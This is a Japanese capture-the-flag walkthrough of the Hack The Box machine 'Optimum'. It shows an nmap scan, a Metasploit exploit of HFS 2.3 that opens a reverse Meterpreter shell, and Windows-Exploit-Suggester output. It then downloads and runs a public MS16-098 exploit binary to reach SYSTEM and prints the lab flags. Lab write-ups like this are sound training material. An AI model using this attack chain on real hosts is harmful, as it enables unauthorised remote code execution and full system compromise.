Hack The Box – Optimum – Walkthrough

今回はポートを2つ開けた

docker run -p 1234:1234 -p 8080:8080 -t -i htb /bin/bash

hfsが動作していることがわかる

# nmap -A -n -F -T5 optimum.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 14:29 UTC
Nmap scan report for optimum.htb (10.10.10.8)
Host is up (0.042s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: print server|printer
Running: HP embedded
OS CPE: cpe:/h:hp:jetdirect_170x cpe:/h:hp:inkjet_3000
OS details: HP 170X print server or Inkjet 3000 printer, HP LaserJet 4250 printer
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

msfconsoleでhfsの脆弱性を攻める

# msfconsole

               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:
                                :::::::+:
                      Metasploit

       =[ metasploit v5.0.100-dev                         ]
+ -- --=[ 2046 exploits - 1106 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: You can upgrade a shell to a Meterpreter session on many platforms using sessions -u <session_id>

msf5 > search hfs

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index, for example use 1 or use exploit/windows/http/rejetto_hfs_exec

msf5 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.17.0.2       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS optimum.htb
RHOSTS => optimum.htb
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.6
LHOST => 10.10.14.14
msf5 exploit(windows/http/rejetto_hfs_exec) > set LPORT 1234
LPORT => 1234
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit

[-] Handler failed to bind to 10.10.14.14:1234:-  -
[*] Started reverse TCP handler on 0.0.0.0:1234
[*] Using URL: http://0.0.0.0:8080/JaNzZ3CB
[*] Local IP: http://172.17.0.2:8080/JaNzZ3CB
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /JaNzZ3CB
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:1234 -> 172.17.0.1:46836) at 2020-08-05 16:23:53 +0000
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\ZOcsozkNyOEfb.vbs' on the target

meterpreter >
[!] Tried to delete %TEMP%\ZOcsozkNyOEfb.vbs, unknown result
getuid
Server username: OPTIMUM\kostas

meterpreter > shell
Process 1324 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73

Windows-Exploit-Suggesterを利用して、脆弱性を調べる

meterpreter > execute -f "cmd.exe /c systeminfo > systeminfo.txt"
Process 3604 created.
meterpreter > download systeminfo.txt
[*] Downloading: systeminfo.txt -> systeminfo.txt
[*] Downloaded 3.26 KiB of 3.26 KiB (100.0%): systeminfo.txt -> systeminfo.txt
[*] download   : systeminfo.txt -> systeminfo.txt
meterpreter > bg
[*] Backgrounding session 1..

msf5 exploit(windows/http/rejetto_hfs_exec) > git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
[*] exec: git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

Cloning into 'Windows-Exploit-Suggester'...
remote: Enumerating objects: 120, done.
remote: Total 120 (delta 0), reused 0 (delta 0), pack-reused 120
Receiving objects: 100% (120/120), 169.26 KiB | 365.00 KiB/s, done.
Resolving deltas: 100% (72/72), done.
msf5 exploit(windows/http/rejetto_hfs_exec) > cd Windows-Exploit-Suggester/
msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --update
msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet
[*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[-] please install and upgrade the python-xlrd library

msf5 exploit(windows/http/rejetto_hfs_exec) > apt install python-pip
msf5 exploit(windows/http/rejetto_hfs_exec) > python -m pip install xlrd --upgrade
...
Installing collected packages: xlrd
Successfully installed xlrd-1.2.0

msf5 exploit(windows/http/rejetto_hfs_exec) > vi systeminfo.txt
※一部文字化けしていてうまく処理できなかったため、化けた部分を削除した※
msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet
[*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done

MS16-098を起点にして、administrator権限を奪取する

「MS16-098 exploit」で検索して、exploitを見つける。

msf5 exploit(windows/http/rejetto_hfs_exec) > wget -d https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
msf5 exploit(windows/http/rejetto_hfs_exec) > sessions

Active sessions
===============

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x86/windows  OPTIMUM\kostas @ OPTIMUM  172.17.0.2:1234 -> 172.17.0.1:48926 (10.10.10.8)

msf5 exploit(windows/http/rejetto_hfs_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload 41020.exe
[*] uploading  : 41020.exe -> 41020.exe
[*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): 41020.exe -> 41020.exe
[*] uploaded   : 41020.exe -> 41020.exe

meterpreter > shell
Process 1100 created.
Channel 5 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

C:\Users\kostas\Desktop>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
51ed1b36553c8461f4552c2e92b3eeed